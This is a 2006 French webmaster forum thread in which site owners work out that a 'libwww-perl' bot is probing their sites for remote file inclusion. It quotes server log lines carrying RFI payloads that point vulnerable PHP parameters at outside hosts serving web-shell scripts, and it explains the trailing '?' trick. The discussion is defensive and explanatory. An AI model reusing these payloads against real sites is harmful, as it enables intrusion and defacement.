Libwww-perl 5.69 : qu'elle est ce bot de hacker ?
24 messages
• Page 1 sur 2 • 1, 2
Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics
- marion17
- WRInaute impliqué

- Messages: 518
- Inscription: 11 Nov 2006
Libwww-perl 5.69 : qu'elle est ce bot de hacker ?
Salut a tous
j'ai un drole de bot nommé Libwww-perl 5.69, qui crawler cette page :
example.com/index.php?path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?
et evidement ça affiche la page d'index
tenez matez ça pour voir : -http://bhlynx.org/
bizarre, vous connaisez ?
Un mec tente de me hacker ? comment le bloquer ?
[Edit kazhar : Inutile de lui faire un lien !]
j'ai un drole de bot nommé Libwww-perl 5.69, qui crawler cette page :
example.com/index.php?path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?
et evidement ça affiche la page d'index
tenez matez ça pour voir : -http://bhlynx.org/
bizarre, vous connaisez ?
Un mec tente de me hacker ? comment le bloquer ?
[Edit kazhar : Inutile de lui faire un lien !]
-

ecocentric - WRInaute accro

- Messages: 3602
- Inscription: 10 Fév 2004
C'est une lib perl pour faire des bots sur mesure. C'est pas forcément du hack, ça peut être nimporte quoi en fait.
-

guicara - WRInaute passionné

- Messages: 2462
- Inscription: 2 Fév 2006
Effectivement, l'url que tu as donné fait peur !
Il s'agit, sans aucun doute, de hacking :
La preuve :
-http://bhlynx.org/htdig/hacked.jpg ^^
Ps : quand on regarde les logs, tous est en mouvement
Edit : Attention pas mal de chevauxl de trois !
La preuve :
---> http://www.graphiques-kits.com/images/cheval-3.png
Et encore un !
---> http://www.graphiques-kits.com/images/cheval-3-2.png
Merci Mc Afee !
Bon je vais encore parcourir ce site...
Edit : encore 2 !
Il s'agit, sans aucun doute, de hacking :
La preuve :
-http://bhlynx.org/htdig/hacked.jpg ^^
Ps : quand on regarde les logs, tous est en mouvement
Edit : Attention pas mal de chevauxl de trois !
La preuve :
---> http://www.graphiques-kits.com/images/cheval-3.png
Et encore un !
---> http://www.graphiques-kits.com/images/cheval-3-2.png
Merci Mc Afee !
Bon je vais encore parcourir ce site...
Edit : encore 2 !
-

paria - WRInaute discret

- Messages: 197
- Inscription: 7 Oct 2006
Il vaut mieux se retirer les gars il s'agit d'une équipe de défaceur, c'est exacte, ils ont du niveaux
j'ai retrouvé des pages défacés dans le cache google, ils utilisent un schellcode avec un scaner de vulnérabilité
-http://72.14.221.104/search?q=cache:TivVV-LKQtMJ:win.intrasys.com.br/imobiliaria/optarimoveis.com.br/admin/
-http://72.14.221.104/search?q=cache:rUxy6Ps0VEwJ:europass.oeek.gr/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D12%26Itemid%3D19%26lang%3
j'ai retrouvé des pages défacés dans le cache google, ils utilisent un schellcode avec un scaner de vulnérabilité
-http://72.14.221.104/search?q=cache:TivVV-LKQtMJ:win.intrasys.com.br/imobiliaria/optarimoveis.com.br/admin/
-http://72.14.221.104/search?q=cache:rUxy6Ps0VEwJ:europass.oeek.gr/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D12%26Itemid%3D19%26lang%3
- marion17
- WRInaute impliqué

- Messages: 518
- Inscription: 11 Nov 2006
paria a écrit:Il vaut mieux se retirer les gars il s'agit d'une équipe de défaceur, c'est exacte, ils ont du niveaux
j'ai retrouvé des pages défacés dans le cache google, ils utilisent un schellcode avec un scaner de vulnérabilité
-http://72.14.221.104/search?q=cache:TivVV-LKQtMJ:win.intrasys.com.br/imobiliaria/optarimoveis.com.br/admin/
-http://72.14.221.104/search?q=cache:rUxy6Ps0VEwJ:europass.oeek.gr/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D12%26Itemid%3D19%26lang%3
J'ai pas tous compris, c'est quoi schellcode avec un scaner de vulnérabilité ? dans qu'elle but ?
guicara merci d'avori tester tous ça
visiblement il on detecté que on fouiller dans les fichier, il n'y a plus rien dans le dossier -http://bhlynx.org/htdig/ , il on du paniquer et tout effacer
On ai dans le grand banditisme du web vous pensez la ?
- marion17
- WRInaute impliqué

- Messages: 518
- Inscription: 11 Nov 2006
guicara a écrit:marion17 a écrit:On ai dans le grand banditisme du web vous pensez la ?
Quand je vois qu'ils sont sur un site d'une banque, logué surment à un compte piraté, je dis oui, j'ai sauvegarder l'imprime écran sur mon dd ^^
Ben punaise....
En tous cas leurs bot n'ai plus repasser sur mon site depuis que j'ai poster ce message, il on du voir le referer de ce topic certainement.... et comprendre certains mot de Français...
T'a bien fait de sauvegarder des données !
-

guicara - WRInaute passionné

- Messages: 2462
- Inscription: 2 Fév 2006
La preuve de ce que j'avance :
http://guillaume.interordi.free.fr/images/scam.JPG
http://guillaume.interordi.free.fr/images/scam.JPG
- karan
- WRInaute discret

- Messages: 54
- Inscription: 3 Mai 2004
Je confirme. Base MySQL mise KO pendant 45 minutes dans la nuit du 24 décembre.
Portez plainte à votre hébergeur et à leur FAI. S'ils font du dégat, étudiez la possibilité d'une action en justice.
200.24.106.14 - - [02/Dec/2006:09:26:47 -0500] "GET /forum/archive/index.php/examples/index.php?send=devilteam&script=http://www.chopstickz.net/xo/cmd.do? HTTP/1.1" 302 345 "-" "libwww-perl/5.65"
212.227.118.59 - - [04/Dec/2006:04:18:55 -0500] "GET /forum/archive/index.php/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.sohbetalevi.com/lol1.txt? HTTP/1.1" 302 280 "-" "libwww-perl/5.64"
209.97.196.230 - - [04/Dec/2006:04:18:56 -0500] "GET /forum/archive/index.php/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.sohbetalevi.com/lol1.txt? HTTP/1.1" 302 280 "-" "libwww-perl/5.805"
89.108.66.115 - - [20/Dec/2006:06:59:24 -0500] "GET /forum/archive/index.php/tools/send_reminders.php?includedir=http://www.tambenlik.net/lol1.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
194.135.81.30 - - [23/Dec/2006:10:06:42 -0500] "GET /forum/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://filizakin.org/lmr.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
70.86.21.194 - - [24/Dec/2006:03:25:08 -0500] "GET /forum/archive/index.php/inc/cmses/aedatingCMS.php?dir[inc]=%20inurl:%22flashchat%22+site:frhttp://filizakin.org/lmr.txt? HTTP/1.1" 200 5783 "-" "libwww-perl/5.805"
72.232.77.106 - - [24/Dec/2006:03:25:10 -0500] "GET /forum/index.php?menu=deti&page=%20allinurl:%22index.php?menu=deti&page%22http://filizakin.org/lmr.txt? HTTP/1.1" 200 73494 "-" "libwww-perl/5.805"
Database error xxxxxxxxxxx:
mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (11)
/xxxxxxxxxxxxxxxxxxxxxxxx/public_html/forum/includes/class_core.php on line 273
MySQL Error :
Error Number :
Date : Sunday, December 24th 2006 @ 03:22:19 AM
Script : http://www.xxxxxxxxxxxxxxxxxxxx/archive ... rg/lmr.txt?
Referrer :
IP Address : 72.232.108.42
Portez plainte à votre hébergeur et à leur FAI. S'ils font du dégat, étudiez la possibilité d'une action en justice.
- marion17
- WRInaute impliqué

- Messages: 518
- Inscription: 11 Nov 2006
guicara a écrit:La preuve de ce que j'avance :
http://guillaume.interordi.free.fr/images/scam.JPG
ben dit donc, impressionant !
karan tu a était victime du meme bot toi alors ?
-

rog - WRInaute passionné

- Messages: 1662
- Inscription: 21 Sep 2006
path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?
==> scanner de vulnerabilité par RFI (remote file inclusion)
en regle generale quand l'extension n'est pas interprétée par le server (full.gif?)
c'est un web shell
et le " ? " coupe la variable d'une possible concatenation dans le path
rog
24 messages
• Page 1 sur 2 • 1, 2
Formation recommandée sur ce thème :
Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Bannir libwww-perl : quel risque en terme de référencement ?
- HELP! blocage de site Web par OVH:libwww-perl
- logs bizarre libwww-perl sur GP60OVH hier et avant-hier
- Bane IP : 72.46.130.186 - Hacker BOT
- W3C-WebCon/5.2.8 libwww/5.2.8 ?????
- W3CRobot/5.3.2 libwww/5.3.2 : Nouveau robot ???
- Google Wireless Transcoder : vieux Bot ou nouveau Bot ?
- IP google bot Vs Bot media partner ?
- Bot adSense et bot google
- RewriteMap et perl
- Etude de Googlebot, le robot crawler de Google (Fresh Bot, Deep Bot) - 05-09-2008
- Lancement de Spider Simulator - 13-06-2004
- Mise à jour de Google Images (Juillet 2006) - 10-07-2006
- Mise à jour de Google Images (16/04/2006) - 18-04-2006
- Google crawle les fichiers CSS - 25-06-2006
- Protégez-vous contre le nofollow - 21-01-2005
- Nouvelles formations Google Analytics chez Ranking Metrics - 21-12-2009
- Google Instant Preview : correction du bug Google Analytics - 01-12-2010
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités
